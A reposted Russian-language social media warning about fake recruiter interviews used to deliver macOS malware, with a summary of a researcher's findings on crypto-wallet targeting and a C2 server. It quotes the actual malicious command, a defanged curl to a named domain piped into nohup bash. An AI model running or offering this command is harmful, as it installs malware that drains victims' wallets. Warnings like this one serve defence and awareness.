Будьте осторожны с фальшивыми собеседованиями. Они сейчас один из самых чистых способов доставки вредоносного ПО.


Мой брат чуть не попался на этой неделе.
Пошаговая игра:
> "Рекрутер" пишет ему в LinkedIn
> Они действительно прочитали его резюме. Они знают его стек технологий. Они бронируют реальное время для собеседования.
> За несколько часов до звонка: "Можешь быстро просмотреть нашу страницу продукта перед разговором?"
> Посещение сайта запускает это в фоновом режиме:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
если ввести пароль, когда запрашивается, всё закончится.
Исследователь (Darksp33d на Github) обратился к реверс-инжинирингу бинарника:
> каждая строка конфигурации зашифрована 570 уникальными пользовательскими функциями
> после расшифровки: полный сервер C2, полный список конечных точек и DSN для отслеживания ошибок Sentry, связанный с разработчиком по юридическому повестку
> 276 целевых ID расширений Chrome, охватывающих 188 криптовалютных кошельков
> перекрытие TTP с "заразным собеседованием" из DPRK очень сильное
> 9/64 по VirusTotal. CrowdStrike, Sophos, Malwarebytes — все пропустили
настоящие рекрутеры, настоящие резюме, настоящие слоты для собеседований, сайт выглядит реально. одна команда curl — и ваши кошельки опустошены.
если "рекрутер" когда-либо просит вас запустить что-либо в терминале, даже что-то безобидное вроде скрипта сборки перед техническим собеседованием, закройте вкладку.
Посмотреть Оригинал
post-image
На этой странице может содержаться сторонний контент, который предоставляется исключительно в информационных целях (не в качестве заявлений/гарантий) и не должен рассматриваться как поддержка взглядов компании Gate или как финансовый или профессиональный совет. Подробности смотрите в разделе «Отказ от ответственности» .
  • Награда
  • комментарий
  • Репост
  • Поделиться
комментарий
Добавить комментарий
Добавить комментарий
Нет комментариев
  • Закрепить